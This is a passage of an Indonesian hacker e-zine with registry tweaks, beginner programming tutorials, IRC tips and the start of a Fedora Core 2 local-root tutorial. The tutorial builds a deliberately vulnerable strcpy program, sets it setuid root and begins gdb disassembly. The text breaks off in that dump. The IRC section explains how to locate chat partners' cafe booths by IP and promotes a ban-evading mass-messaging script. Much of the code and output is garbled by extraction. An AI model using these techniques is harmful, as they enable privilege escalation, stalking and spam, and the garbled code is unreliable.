5. Buat key baru pada HKLM\SOFTWARE\Classes\CLSID\{55028DEAEA62-4c5f-A1F3-9D123DFAEDA1} dengan nama DefaultIcon 6. Buat expandable string dengan nama (Default) lalu isi datanya dengan shell32.dll,4 7. Buat key baru pada HKLM\SOFTWARE\Classes\CLSID\{55028DEAEA62-4c5f-A1F3-9D123DFAEDA1} dengan nama InProcserver32. 8. Buat expandable string dengan nama (Default) lalu isi datanya dengan SHDocVw.dll 9. Buat string dengan nama ThreadingModel dan isi datanya dengan Apartement 10. Buat key baru pada HKLM\SOFTWARE\Classes\CLSID\{55028DEAEA62-4c5f-A1F3-9D123DFAEDA1} dengan nama Instance 11. Buat string baru dengan nama CLSID lalu isi datanya dengan {0AfACED1-E828-11D1-9187-B532F1E9575D} 12. Buat key baru pada HKLM\SOFTWARE\Classes\CLSID\{55028DEAEA62-4c5f-A1F3-9D123DFAEDA1}\Instance dengan nama InitPropertyBag 13. Buat DWORD dengan nama Attributes lalu isi datanya dengan 15 14. Buat expandable string dengan nama Target lalu isi datanya dengan direktori folder yang anda inginkan misalkan D:\My Documents 15. Buat key baru pada HKLM\SOFTWARE\Classes\CLSID\{55028DEAEA62-4c5f-A1F3-9D123DFAEDA1} dengan nama ShellFolder 16. Buat DWORD dengan nama Attributes lalu isi datanya dengan f8000110 17. Buat string baru bernama WantsFORPARSING 18. Buat key baru pada 15
HKLM\SOFTWARE\Microsoft\Windows\CurentVersio HKLM\SOFTWARE\Microsoft\Windo ws\CurentVersion\Explorer\My n\Explorer\My Computer\NameSpace\ dengan nama {55028DEA-EA62-4c5f-A1F39D123DFAEDA1} Menonaktifkan Desktop Clean-Up Wizard Setiap 60 hari sekali secara otomatis akan muncul kotak dialog yang
menanyakan kepada anda apakah anda ingin menghapus icon pada desktop yang tidak pernah terpakai atau tidak. Jika anda tidak ingin menerima pesan itu lagi, anda bisa menggunakan cara ini. 1. Buka HKCU\Software\Microsoft\Windows HKCU\Software\M icrosoft\Windows\CurrentVersion\ \CurrentVersion\Explorer\Deskt Explorer\Deskt op\ 2. Ubah data pada DWORD NoRun menjadi 1 Menonaktifkan Peringatan Low Disk Space Merasa terganggu karena ada peringatan hardisk anda penuh? Lakukan cara di bawah ini. 1. Buka
HKCU\Software\Microsoft\Windows HKCU\Software\M icrosoft\Windows\CurrentVersion\ \CurrentVersion\Policies\Explore Policies\Explore r\ 2. Buat DWORD baru bernama NoLowDiskSpaceChecks lalu masukkan angka 1 pada datanya Mengganti Wallpaper Additional Directory Bagi anda yang gemar mengganti wallpaper, anda mungkin akan tertolong dengan konfigurasi register ini. 1. Buka HKLM\SOFTWA HKLM\SOFTWARE\Microsoft\Windo RE\Microsoft\Windows\CurrentVersio ws\CurrentVersion\ n\ 2. Ganti data pada string WallPaperDir menjadi letak direktori yang anda inginkan Auto-Open Explorer Setelah Restart Konfigurasi ini akan membuat explorer secara otomatis terbuka setelah komputer melakukan restart 1. Buka HKCU\Software\Microsoft\Windows HKCU\Software\M icrosoft\Windows\CurrentVersion\ \CurrentVersion\Explorer\Advan Explorer\Advan ced 2. Ganti data pada DWORD PersistBrowsers menjadi menjadi 1 Singkatan Agar tutorial ini tidak terlalu panjang ada beberapa singkatan yang saya gunakan: 1. HKCR = HKEY_CURENT_ROOT 2. HKCU = HKEY_CURRENT_USER
16
3. HKLM 4. HKU 5. HKCC
= HKEY_LOCAL_MACHINE = HKEY_USERS = HKEY_CURRENT_CONFIG
Mohon maaf jika ada kesalahan dalam penulisan tutorial ini. Semoga sekelumit tulisan ini bisa membantu anda yang ingin belajar Register Editor. Kritik dan saran bisa dikirimkan langsung melalui email saya. Tunggu tutorial lanjutannya. Thank's to 4JJI SWT, My Parents, My Little Sister(Nanda), ^family_code^ and The Team - XQDC XQDC X-Setup Pro (Good works bro! bro!)) By : ^rumput_kering ^rumput_kering^ ^
17
Belajar membuat program penampil text dengan bahasa Assembler
Bahasa Assembler adalah bahasa pemograman tingkat rendah dimana hanya sedikit orang yang menguasai bahasa ini jika dibandingkan dengan para programmer secara keseluruhan, dengan bahasa assembler maka program yang anda hasilkan lebih optimal dan lebih kecil dibandingkan dengan berbagai macam bahasa pemograman lainnya. Untuk pertama kali anda downloadlah program Turbo Assembler, setelah itu ada 2 file *.EXE yang sangat penting yaitu : TASM.EXE (Untuk mengcompile file tahap 1 untuk menjadikan file ASM menjadi OBJ) TLINK.EXE (Untuk mengcompile file tahap 1 untuk menjadikan file OBJ menjadi EXE) Sebelum memulai kita buat dahulu source code assembler dengan MS-DOS Editor atau Notepad, saran penulis lebih baik menggunakan MS-DOS Editor agar kita terbiasa di mode DOS. Sekarang pastikan kita pada directory program Turbo Assembler, disitu kita buat file tulis.asm (Dalam Turbo Assembler tidak mendukung file dengan nama panjang, gunakan nama file yang singkat), Saat ini langsung aja masuk ke MSDOS Editor caranya ketik dibawah ini di DOS. edi t t ul ul i s . a as sm
18
Setelah itu muncul program MS-DOS Editor, disitu kita ketikkan source code dibawah ini . MODEL smal l . STAC STACK K 100h . DATA Hel l oMessag essage e DB ' Sa Saya ya be bell aj ar B Bah ahasa asa Assembl er l ho' ho' , 13, 13, 10, 10, ' $' . CODE mov ax ax,, @dat a mov d ds, s, ax ; set DS t o p poi oi nt t o t he da datt a seg segm ment ent mov ah ah,, 9 ; DOS p prr i nt st r i ng f unct nct i on mov d dx, x, OFFS FFSET ET Hel l oMessag essage e ; po poii nt t o "H "Hel el l o, worl d" i nt 21h ; di s p pll ay "H "He el l o, worl d" mov ah ah,, 4ch ; DOS t er mi nat nat e pr og ogrr am f un unct ct i on i nt 21h 21h ; t ermi nate t he p prr og ogrr am END
Setelah itu kita save file tulisanku.asm dan keluar dari MS-DOS Editor, sekarang juta harus mengcompile file tulisanku.asm sebanyak 2x (biasanya di bahasa pemograman tingkat tinggi hanya 1x). Cara mengcompile tahap pertama, ketikkan : t as as m t u ull i s . a as sm
Jika berhasil maka muncul muncul tulisan dibawah ini
Setelah sukses kita akan mendapat file tulis.obj domana file tulis.obj akan kita compile lagi menjadi file EXE caranya akan melakukan compile tahap kedua dengan mengetikkan : t l i nk t u ull i s . o ob bj
Jika berhasil akan muncul muncul tampilan dibawah ini
19
Setelah berhasil kita ketikkan t ul ul i s
Hasil dari kita mengetikkan tulis pada perintah DOS maka muncul kalimat "Saya be bell aj ar Ba Baha hasa sa A Assem ssembl er Lho"
Inilah contoh percobaan kita untuk mengenal bahasa Assembler.
Penulis : Kurniawan / ^family_code^
20
Belajar membuat program link website dengan Turbo Basic Penulis sebenarnya sebenarnya mengenal bahasa BASIC dari SMP tapi penulis baru benarbenar mendalaminya pada tahun 2000, saat itu penulis mengimplementasi mengimplementasikan kan program BASIC untuk membuat program-program sederhana. Bahasa Turbo Basic bukan bahasa pemograman terstruktur seperti bahasa Pascal sehingga bahasa Turbo Basic adalah bahasa yang paling mudah digunakan. Saat ini kita akan membuat program membuat link ke website tertentu dengan melalui Turbo Basic, bisakah ? kita coba saja membuatnya, pertama-tama jalankan file tb.exe dari DOS DOS atau Windows dan anda akan mendapat mendapat tampilan seperti ini.
Setelah itu pilih New pada dibuat file laluoleh pilihpenulis Edit untuk membuat program baru, lalu ketikkan source code yang untuk anda pelajari. 10 cl s pri nt pr i nt pr i nt pr i nt pri nt pr i nt i np nput ut i f a$ i f a$ i f a$ i f a$ i f a$ i f a$
" Membu buat at l i nk web ebsi si t e d den enga gan n B Bah ahasa asa Tu Turr bo Basi c " 1. f ami l ycod ycode e " 2. go goog ogll e " 3. ya yah hoo " 4. ka kaff egaul " 5 5.. exi t " Ket i kka kkan n n nom omor at au na nam ma si t us y yan ang g i ng ngii n d dii ku kunj nj un ungi gi : " a$ = "1" t he hen n goto 1 110 10 = "f ami l yco ycod de" t hen got got o 1 110 10 = "2" t he hen n goto 1 120 20 = "go "goog ogll e" t hen hen g goto oto 1 12 20 = "3" t he hen n goto 1 130 30 = "yah "yahoo oo"" t he hen n go gott o 13 130 0
a$ = = "kaf "4" teg he hen nl "goto 1 140 40 ii ff a$ egau aul t hen goto 1 14 40 i f a$ = "5" t he hen n goto 2 200 00
21
i f a$ = "ex "exii t " t hen goto 2 20 00 100 pr i nt "M "Maa aaff peri nt ah anda anda t i dak di ken kenal atau si t us y yan ang g an and da ca carr i t i dak ad ada" a" shel shel l "pa "pau use" se" got o 10 110 sh he el l " c : " sh shel el l "cd\ prog progrr a~1\ i nt ern~1" shel shel l "i exp xpll or e ht t p: / / www. yo yog gya yaff r ee ee.. t k got o 10 120 sh he el l sh shel el l shel shel l got o 130 sh he el l sh shel el l shel shel l got o 140 sh he el l sh shel el l shel shel l got o 150 got o 200 end
"c:" "cd\ prog progrr a~1\ i nt ern~1" "i exp xpll or e ht t p: / / www. googl ogl e. com com 10 "c:" "cd\ prog progrr a~1\ i nt ern~1" "i exp xpll or e h htt t p: / / www. ya yah hoo. co com m 10 "c:" "cd\ prog progrr a~1\ i nt ern~1" "i exp xpll or e ht t p: / / www. ka kaff egau aull . com com 10 200
Setelah selesai coba jalankan program dengan memilih RUN, jika berhasil hasilnya seperti dibawah ini.
Jika sudah selesai selesai maka compilelah prog program ram ini menjadi file EXE caranya pilih option lalu pilih Compile to lalu pilih EXE file seperti gambar dibawah ini :
22
Hasil dari compile File EXE adalah ada lah program bisa dijalankan langsung di DOS dan Windows.
Penulis : Kurniawan / ^family_code^
23
Belajar membuat program pilihan dengan Turbo Pascal
Sebenarnya banyak sekali materi yang harus dipelajari untuk belajar pemograman Turbo Pascal namun kita tidak semua materi dapat berguna untuk saat ini, penulis akan mengajarkan tentang teknik if then else yang paling banyak serta populer digunakan karena memang teknik ini sangat dibutuhkan untuk banyak sekali kasus.
Pertama kali Install dulu Turbo Pacal boleh versi DOS juga bisa versi Windows, tapi ingat buat Turbo Pascal versi DOS anda membutuhkan Patch jika komputer anda diatas kecepatan 200Mhz misalnya Pentium II - 233 Mhz, kalau mau repot dikit sebenere bisa, kurangi aja kecepatan komputer kamu lewat BIOS maka anda dapat ngejalanin Turbo Pascal, hehe, saran penulis lebih baik menggunakan Turbo Pacal for Windows aja deh karena kita tidak perlu repot mencari patchnya atau ngurangin kecepatan komputer segala, oh iya hampir nCrr t Maka jika kita di versi DOS lupa jika di versi Windows memakai Uses Wi nC menggunakan Uses Cr t .
24
Sekarang kita akan membahas Turbo Pascal for Windows Setelah Turbo Pascal for Windows di Install pilih Start lalu Programs lalu TPW 1,5 lalu klik TPW 1,5, maka muncul tampilan Turbo Pascal for Windows, lalu kita pilih New lalu ketik dibawah ini : progr am menuf enuf ami l ycod ycode; e; uses Wi nCr nCr t ; var var c : s t r i ng; be begi gi n c l r s cr cr ; r ep epea eatt wr i t el n( ' Prog Progrr amdaft ar kel kel ompok pok b bua uatt an Yo Yog gya F Fam ami l y C Cod ode' e' ) ; wr i t el el n( ' ' ) ; wr i t el n( ' 1. Daft ar ke kell ompok b bu uah ' ) ; wr i t el n( ' 2. Daf t ar ke kell ompok hewan' an' ) ; wri t el n( ' 3. Daf t ar ke kell ompok ko kott a' ) ; wr i t e l n( ' 4. K Ke el uar ' ) ; wr i t el el n( ' ' ) ; wr i t e l n( ' Tul i s a an ngk an anya s sa aj a : ' ) ; r e a ad dl n( c ) ; i f ( c ) = ' 1' t h he en be begi gi n c l r s cr cr ; wr i t el e l n ( ' Apel ' ) ; wr i t el e l n ( ' J er u uk k' ) ; wri t el n (' Mangga' ) ; wr i t e l n ( ' Mel on' ) ; end el s e i f ( c ) = ' 2' t he hen be begi gi n c l r s cr cr ; wr i t e l n( ' Kadal ' ) ; wr i t e l n( ' Monyet ' ) ; wr i t el e l n( ' Sapi ' ) ; wr i t e ell n( ' Kel i nc i ' ) ; end el s e i f ( c ) = ' 3' t he hen be begi gi n c l r s cr cr ; wr i t e l n( ' Yogyakar t a ' ) ; wr i t el e l n( ' J akar t a' ) ; wri t el n( ' Bandung ' ) ; wr i t e l n( ' Sur a b ba aya' ) ; end el s e i f ( c ) = ' 4' t he hen be begi gi n c l r s cr cr ; w r i t el n (' Ter Ter i ma k kas asii h u ud dah masu asuk p prr ogr am i ni ' ) ; end el s e i f ( c ) = ' ' t h he en
25
wr i t e l n el s e wr i t el n read rea dl n; c l r s cr cr ; unt i l c wr i t e ell n wr i t el n wr i t e l n en end. d.
( ' Per i nt ahnya bel um di i s i ' ) ( ' Maa aaff , harap t ul i ska skan n peri nt ahn ahnya deng dengan an ben enar' ar' ) ; = (' (' ('
' 4' ; ' ); Kl i k si l ang ang p pad ada a u ujj ung ung k kan anan an pr ogr ogr amat au an and da men enek ekan an t ombol Al t + F4' F4' ) ; unt u k kel uar d da ar i pr o g grr a m i ni . ' ) ;
Setelah selesai simpanlah dahulu source code ini menjadi ekstensi PAS lalu compilelah program ini dan hasilnya sebagai berikut :
Source code diiatas dapat anda ubah-ubah sendiri sesuai dengan keinginan anda sendiri, semoga dengan tutorial pemograman ini anda dapat mengenal pemograman Turbo Pascal lebih baik. Penulis : Kurniawan / ^family_code^
26
Belajar membuat program tampil sederhana dengan C++ Builder
Bahasa C telah berkembang dengan pesat, C++ Builder merupakan salah satu program bahasa C yang sangat baik dan stabil, mari kita mengenal bahasa ini dengan membuat program sederhana yaitu menampilkan text pada form edit. Sebelumnya anda harus mempunyai program C++ mengimplementasikan mengimplem entasikan pembelajaran bahasa pemograman ini.
Builder
untuk
Pilih Start lalu Programs lalu pilih Borland C++ Builder lalu masuk ke C++ Builder.
Pilih New lalu muncul tampilan seperti dibawah ini
27
Pilih Application lalu pilih OK dan muncul tampilan
Setelah itu kita beri nama komponen form, edit dan button dengan spesifikasi sebagai berikut : Komponen Form
Properti Name
Nilai Yogya Family Code Edit Name Tampil Tampil dikosongkan Button Name Button Caption Tampilkan (Komponen ditulis pada Object Inspector) Setelah selesai dan kita rapikan maka hasilnya seperti dibawah ini
28
Setelah itu double klik pada button Tampilkan, dan muncul editor lalu ketik : vo voii d __f ast ca call l TFo Forr m1: : but t onCl i ck(TObj ec ectt *Se *Sen nder ) { t ampi l - >Te Text xt = "Yog "Yogya ya Fami l y C Cod ode"; e"; }
Karena diatas sudah ada source code dibawah ini maka void __fastcall TForm1::buttonClick(TObject *Sender) { }
maka kita tinggal menambahkan source code dibawah ini pada program tampil->Text= "Yogya Family Code";
Setelah selesai kita jalankan program dan hasilnya seperti ini (jika diklik pada tombol tampilkan).
Sebagai catatan di program C++ Builder ini huruf kecil dan besar dibedakan, dan perintah C++ harus huruf besar seperti misalnya "Text" bukan "text".
Penulis : Kurniawan / ^family_code^
29
Belajar membuat program kamus dengan C++ Builder
langkah awal hampir sama dengan tutor dihalaman sebelumnya
Form pada program kamus Komponen Form Edit
Properti Name Name Text Edit Name Caption Button Name Caption (Komponen ditulis pada Object Inspector)
Nilai Kamus Indonesia (Dikosongkan) English (Dikosongkan) Translate Translate
Lalu setelah form disetting seperti diatas maka kita double klik pada button translate lalu kita isikan : vo voii d __f ast ca call l TFo Forr m1: : But t on1Cl i ck(TObj ect *Se *Sen nder )
30
{ if if if if }
(i (i (i (i
nd ndon onesi esi a- >Te Text xt ==" di man ana") a") en engl gl i sh- >Te Text xt =" whe herr e"; nd ndon onesi esi a- >Te Text xt ==" r umah ah") ") en engl gl i sh- >Text Text ="home"; ndon onesi esi a- >Te Text= xt== ="seda "sedan") n") engl engl i sh sh-- >Te Text= xt="car "car "; ndon onesi esi a- >Te Text= xt== ="sal ah") ah") en engl gl i sh sh-- >Te Text= xt="f "f al se";
Setelah selesai kita tekan F9 atau Run dan programpun akan berjalan, anda dapat menambah isi kata kamus dengan logika seperti pada program.
Hasil dari program kamus Anda dapat membuatnya jauh lebih baik karena disini hanya diajarkan dasar logikanya saja.
Penulis : Kurniawan / ^family_code^
31
Tips dan triks IRC
Tips IRC : Pertama-tama.. Sebelum anda memulai chatting dengan mIRC ada 7 di halmIRC yangWarnet sangat penting yang harus anda perhatikan jika ingin lebih tertutup : 1. Periksa Full name pada option Connect, gantilah Full name jika ada nama warnetnya tertulis
2. Periksa pada option Connect lalu pada identd, gantilah "user id" jika ada nomor room tertulis disini
32
3. Periksa pada option IRC lalu pada Logging, gantilah menjadi "none" pada "automatically logs" jika posisi diluar itu.
4. Periksalah Quit Message pada menu pilihan IRC lalu messages, jika disitu muncul nama dan alamat warnet maka segera gantilah pesan itu dengan kalimat lain atau dikosongkan saja, karena jika anda mengaktifk mengaktifkannya annya
33
5. Setelah keluar / disconnect dari mIRC, jangan lupa masuk mIRC lagi, dan segera ganti nama, e-mail, nickname alternative juga user id karena jika anda lupa menggantinya maka orang yang menggunakan komputer setelah anda akan mengetahui nama, e-mail, nickname, alternatif dan user id anda. 6. Jangan lupa, jika anda sering copy paste, segera hilangkan memory copy paste anda dengan melakukan copy text lain untuk menghindari orang lain untuk mengetahui paste text anda. 7. Periksa pada Windows Task Manager apakah ada Keylogger terpasang :)
Bahaya Keylogger di Warnet walaupun ada DeepFreeze di Komputer warnet -
Keylogger adalah program yang berbahaya jika terpasang, Ini yang cukup Keylogger sedikit susah diperiksa jika tidak ada program scanner keylogger, tapi jika anda ingin memeriksanya maka pertama-tama lakukan Ctrl + Alt + Shift + F6 untuk memeriksa bahwa DeepFreeze di warnet aktif. Dengan aktifnya Deep Freeze maka mungkin bisa dikatakan 95% anda aman dari keylogger untuk lebih yakin 99% sekarang tekan Ctrl+Alt+del, lihat list program yang sedang berjalan, jika ada nama program yang
34
aneh dan asing berjalan maka matikan saja prosesnya tapi anda harus hati-hati dalam melakukanya. melakukanya. Mengapa tidak 100% ? karena masih terbuka jika keylogger dari hardware yang terpasang antara keyboard dengan port dan kemungkinan terjadi ini sangat kecil ya penulis mungkin mengira-ngiranya mengira-ngiranya sekitar 1%.
Solusi mengapa user id pada mIRC tidak berubah ?
Ada seorang chatter bertanya kepada penulis melalui e-mail tentang user id yang tidak bisa diubah, setelah diteliti ternyata pada Enabled Identd server tidak dicentang, ingat sebelum anda mengisi user id maka yakinkan dulu Enable Identd server, hal seperti ini ada di beberapa warnet, semoga tips ini dapat berguna bagi semuanya yang ingin meminimalkan meminimalk an dirinya untuk dapa dapatt dilacak.
Bagaimana cara melacak keberadaan teman chat kita ?
Whois saja chatter tersebut lalu cocokkan ip addreasnya dengan daftar ip addreas warnet Yogya di samping kanan. Jika ip addreas anda tidak ada dalam daftar maka anda dapat menggunakan pelacakan lain seperti h ttp://www.apnic.org, :)
Bagaimana cara melacak boks warnet teman chat kita ? Whois saja chatter tersebut lalu lihat sebelah kiri dari sebelum tanda "@ip addreas", jika ada angka maka kemungkinan besar dia di room tersebut, jika tidak ada maka periksa ip addreasnya addreasnya apakah warnet tersebut menerapkan berbeda ip addreas tiap boks, jika iya maka hitunglah logika ip addreas tersebut sehingga ahkirnya dapat menemukan tempat boks teman chat anda.
35
Bagaimana kita ingin mencari teman chat di warnet sendiri (Hanya untuk channel yang memiliki BOT khusus !seen)? D di channel #yogyakarta cukup ketikkan !seen *!*@ip addreas warnet anda, bisa juga dengan !seen nickname, fasilitas ini biasanya disediakan channel-channel besar tapi tidak menutep channel kecilpun mempunyai fasilitas ini.
Bagaimana kita ingin mencari teman chat di warnet sendiri ? (Dari perintah DAL.NET! Tidak perlu BOT channel) /who #nama channel *@ip addreas warnet (cara ini sangat efektif jika BOT channel benar-benar memproteksi para chatter sehingga sangat membatasi informasi yang akan diberikan kepada anda).
Bagaimana kita ingin mencari nickname teman kita di channel #yogyafree ? cukup mudah, ketikkan di channel #yogyafree !seen .
36
Bagaimana memasang proxy di IRC Carilah proxy di google, kemudian pastekan ke option mIRC proxynya yaitu pada "connect" lalu "firewall', firewall support diganti "server", protocol diganti "proxy" lalu tinggal anda isi hostname dan portnya sesuai dengan proxy yang anda dapatkan.
Menampilkan ip-ip addreas para chatter di channel?
Centang pada Show addreas lalu klik OK.
37
Hennes Script NW v0.61 IRC untuk mengirimkan pesan ke para chatter Script ini mampu memberikan pesan ke seluruh chatter dalam 1 channel meskipun anda langsung di ban oleh AOP, SOP bahkan founder waktu anda mengirim pesan oleh chatter-chatter, tapi pesan anda ke chatter tersebut tidak akan hilang / atau berhenti, tapi pengiriman pesan terus berjalan, bayangkan, apa kurang hebat ? tapi script ini mempunyai kelemahan yaitu kemampuan ini tidak akan berjalan jika anda masuk ke channel besar kayak #jakarta, #bandung, #bawel, #solo, #semarang dan sebagainya, mengapa ? karena bagaimana mungkin kita chatting dengan semua orang di channel dalam 1 - 2 detik. jelas langsung disconect, cocoknya script ini dijalankan di channel yang ga begitu rame kaya #manado, #purwokerto, #cilacap (kalo pas sepi) dan sebagainya
Sebelum kita memulai saran penulis masuklah di Option dahulu untuk mengganti themenya menjadi MIRC, tapi kalau anda tidak ingin itu juga bukan masalah untuk percobaan script ini.
Bagaimana cara menjalankan fasilitas ini ? Pada saat anda sudah connect ke dal.net dan masuk channel maka segera klik kanan saja pada room channel, lalu pilih pilihan other dan klik pada pilihan Send private message to everyone, dan tulis aja pesannya, nanti para chatter jika menjawab maka anda akan terasa di ajak chat duluan.
Penulis : ^family_code^ / Kurniawan
38
================================= ================ =============================== ==============
Tehnik hacking local root on Fedore core 2 made by : dokter^cinta @dalnet greatz to #bruteforce team... @dalnet and #indohacking, #mvp, #antihackerlink, #yogyafree, #binushacker and #jam5 crew lets rock in roll ================================= ================ =============================== ==============
Mari membuat program bahasa c yang simpel untuk test vulnerability [ dokt okt er @l oca call host f edora]$ ca catt vul vul . c i nt mai n( i nt argc, cha char *a *arr gv[ ] ) { ch char ar bu buf f er [ 256] ; str cp py y( b u uff f er , ar g v v[[ 1] ) ; return 0; 0; }
sekarang mari kita kompilasi [ dokt okt er @l oca call host f edora]$ g gcc cc - o v vu ul vul vul . c
dan sekarang mari kita buat sesuatu untuk sebuah test yang sempurna [ dok oktt er@l oca ocall ho host st f ed edora] ora] $ su Passw Passwor or d: [ r oot oot @l oc oca al host f edor a]# ch chg gr p roo roott vul vul [ r oo oott @l oca ocall host f ed edora] ora] # chow chown r oo oott vu vull [ r oo oott @l oca ocall ho host st f ed edora] ora] # chmod 4755 4755 vul vul [ r oot @l oc a all hos t f edor a ] # l s - l vul - r wsr - xr- x 1 r oo oott r oo oott 4733 11?12 11?12 23: 11 vu vull [ r oot oot @l oc oca al host f edor a]# su d dok oktt er [ dok oktt er@l oca ocall ho host st f ed edora] ora] $
nah sekarang kamu siap menyerang program vulnerability.... dan langkah pertama yang harus kamu jalanin adalah mencari alamat dari dengan menggunakan GDB gdb apaan tuh ? pasti kamu bertanya.... jawaban nya ... use your imajination hehehehehe [ dokt dokt er@l oca ocall host f ed edora] ora] $ gdb gdb vu vull
39
GNU gd gdb b R Red ed Hat Li nux nux ( 6. 0p 0post ost - 0. 20 2004 0402 0223 23.. 19 19rr h) Cop opyr yr i ght ght 20 2004 04 Fr ee So Soff t ware Fo Foun unda datt i on on,, I nc. GDB i s f r ee so soff t ware, cov covered ered b by y t he GNU Gen eneral eral Pu Publ bl i c Li cense, cense, and and yo you u a arr e wel co com me to ch chan ang ge i t and and/ or di st r i but e co cop pi es o off i t under ce cerr t ai n c con ond di t i on ons. s. Type " show copyi ng" t o see t he condi t i ons. Ther e i s absol ut el y no war r ant y f or GDB. Type " show war r ant y" f or det ai l s. Thi s GDB was conf i gur ed as " i 386- r edhat - l i nux- gnu". . . ( no debu debuggi ggi ng symbol s f ound ound)) . . . Usi ng hos t l i bt h r e ea ad_ db db l i br a r y " / l i b/ t l s / l i bt h r e ea ad_ db db. s o o.. 1" . ( gdb gdb)) b mai n B eakpo 0x804 04837 8379 9 ( rgeakpoi db) r i nt 1 at 0x8 St art i ng pr og ogrr am: / home/ dok oktt er/ f ed edora/ ora/ vu vull Er r or whi l e mappi appi ng sha sharr ed l i brary se sect ct i ons: ons: : ? 깃 났 . Er r or whi l e r eadi eadi ng sha sharr ed l i brary sy sym mbol s: : 洹 몃 ? 漿 佾 應 좏 좊 ━ 媛 壹 . ( no de debu bugg ggii ng symbo boll s f ou ound nd)) . . . ( no de debu bugg ggii ng symbol bol s f ou ound nd)) . . . Err or w whi hi l e r ea eadi di ng shar shar ed l i br ary sym symbol s: : 洹 몃 ? 漿 佾 應 좏 좊 ━ 媛 壹 . Er r or whi l e r eadi eadi ng sha sharr ed l i brary sy sym mbol s: : 洹 몃 ? 漿 佾 應 좏 좊 ━ 媛 壹 . Br eakpoi eakpoi nt 1, 0x0 0x080 8048 4837 379 9 i n mai n ( ) ( gdb) di sas sas ex exe ecl Dump of of assembl er cod code e f or f unct unct i on ex execl ecl : 0x005f ea00 : push %ebp 0x005f ea01 : mov %es p, %ebp 0x005ff ea03 : 0x005 l ea 0x10( %ebp) , %eax 0x005ff ea06 : 0x005 push %edi 0x005ff ea07 : 0x005 push %esi 0x005f ea08 : push %ebx 0x005ff ea09 : 0x005 sub $0x10 $0x1030, 30, %esp 0x005ff ea0f : mov 0x005 0xc( %ebp) , %ecx 0x 0x00 005f 5f ea1 ea12 2 >: movl $0 $0x40 x400, 0, 0x 0xff f f f f f f 0( %ebp) ebp) 0x005f 0x0 05f ea1 ea19 9 : l ea 0x1 0x1b( b( %esp) , %esi 0x 0x00 005f 5f ea ea1d 1d >: an and d $0xf $0xf f f f f f f 0, %esi 0x 0x00 005f 5f ea2 ea20 0 >: cal l 0x5 0x58c9 8c90d 0d 0x005f ea25 : add $0x905d7, %ebx 0x005ff ea2b : mov 0x005 %ecx, ( %esi ) 0x005ff ea2d : t est 0x005 %ecx, %ecx 0x 0x00 005f 5f ea2 ea2ff >: mov %eax eax,, 0xf f f f f f e8( e8( %ebp) ebp) 0x 0x00 005f 5f ea3 ea32 2 >: movl $0 $0x1, x1, 0xf f f f f f ec( %ebp) ebp) 0x005ff ea39 : j e 0x005 0x5f ea73 0x 0x00 005f 5f ea3 ea3b b >: movl $0 $0x1a x1a,, 0xf f f f f f e0 e0(( %ebp) ebp) 0x 0x00 005f 5f ea4 ea42 2 >: l ea 0x0 0x0(( %esi ) , %esi 0x005f 0x0 05f ea4 ea49 9 : l ea 0x0 0x0(( %edi ) , %edi 0x005f 0x0 05f ea5 ea50 0 : mov 0xf f f f f f f 0( %ebp) ebp) , %edx 0x005f 0x0 05f ea5 ea53 3 : cmp %edx, 0xf f f f f f ec( %ebp ebp)) 0x005f 0x0 05f ea5 ea56 6 : j e 0x5 0x5ff ea9 ea96 6 > 0x 0x00 005f 5f ea5 ea58 8 >: addl addl $0 $0x8, x8, 0xf f f f f f e0( e0( %ebp) ebp) 0x005f 0x0 05f ea5 ea5c c : mov 0xf f f f f f e8( %ebp) ebp) , %edx 0x 0x00 005f 5f ea5 ea5ff >: mov 0xf f f f f f ec( %ebp) ebp) , %edi edi 0x 0x00 005f 5f ea6 ea62 2 >: addl addl $0 $0x4, x4, 0xf f f f f f e8( e8( %ebp) ebp) 0x005f ea66 : mov ( %edx) , %ecx 0x005f 0x0 05f ea6 ea68 8 >: mov %ecx, ( %esi , %edi , 4) 0x005ff ea6b : i nc 0x005 %edi 0x005ff ea6c : t est 0x005 %ecx, %ecx 0x 0x00 005f 5f ea6 ea6e e 0>: mov %edi edi , 0xf f f f f f ec( %ebp) ebp) 0x005ff ea71 : j ne 0x005 0x5f ea50 0x005f 0x0 05f ea7 ea73 3 >: mov 0xf f f f f ee0( ee0( %ebx) , %edi 0x005ff ea79 : mov 0x005 ( %edi ) , %ecx 0x005ff ea7b : mov 0x005 %esi , 0x4( %esp) 0x005ff ea7f : mov 0x005 0x8( %ebp) , %esi 0x005f ea82 : mov %ecx , 0x8( %esp) 0x005ff ea86 : mov 0x005 %esi , ( %esp) 0x005f 0x0 05f ea8 ea89 9 >: cal l 0x5 0x5ff e7a e7a0 0 0x 0x00 005f 5f ea91 ea8 ea8e e < 14 142> 2>:: pop l ea 0x005f execl 0x005ff ea92 : pop 0x005
0xf f f f f f f 4( %ebp) ebp) , %esp % ebx %esi
40
0x005f ea93 0x005f 0x005f ea94 0x005f 0x0 05f ea9 ea95 5 0x005f 0x0 05f ea9 ea96 6 0x005f 0x0 05f ea9 ea99 9 0x005f ea9c 0x005f 0x0 05f ea9 ea9e e 0x 0x00 005f 5f eaa eaa1 1 0x005f eaa4 0x005f 0x0 05f eaa6
: : >: >: >: : >: 1>: : >:
0x0 0x005f 05ff eaa9 169> >:: 0x005f 0x005 eaac < 0x 0x00 005f 5f eab eab0 0 6>: 0x005f 0x0 05f eab eab3 3 >: 0x005ff eab6 : 0x005 0x005ff eab8 : 0x005 0x005f 0x0 05f eab eaba a : 0x005f 0x0 05f eab eabb b >: 0x005f eabe : 0x005ff eac0 : 0x005 0x005ff eac3 : 0x005 0x005f 0x0 05f eac6 >: 0x005f eac8 : 0x005ff eaca : 0x005 0x005f 0x0 05f eacc >: 0x005f 0x0 05f eacd >: 0x005f ead0 : 0x005ff ead2 : 0x005 0x005ff ead5 : 0x005 0x005f 0x0 05f ead ead8 8 >: 0x005f eada : 0x 0x00 005f 5f ead eadc c 0>: 0x 0x00 005f 5f ead eadff 3>: 0x005f eae2 : 0x 0x00 005f 5f eae eae4 4 8>: 0x005ff eae7 : 0x005 0x005ff eaec < 0x005 : 0x005ff eaed : 0x005 0x005ff eaee : 0x005 0x005ff eaef : 0x005 End End of assembl er dump. ( gd gdb) b) q The pr ogr am i s r unni ng.
pop pop r et mov mov add mov and and sub mov
%edi %ebp 0xf f f f f f ec( %ebp ebp)) , %edx 0xf f f f f f e0( %ebp ebp)) , %ecx %edx, %edx %edx, 0xf f f f f f e4( %ebp ebp)) $0 $0xf xf f f f f f f c, %ecx %ecx , %es esp p %edx, 0xf f f f f f f 0( %ebp ebp))
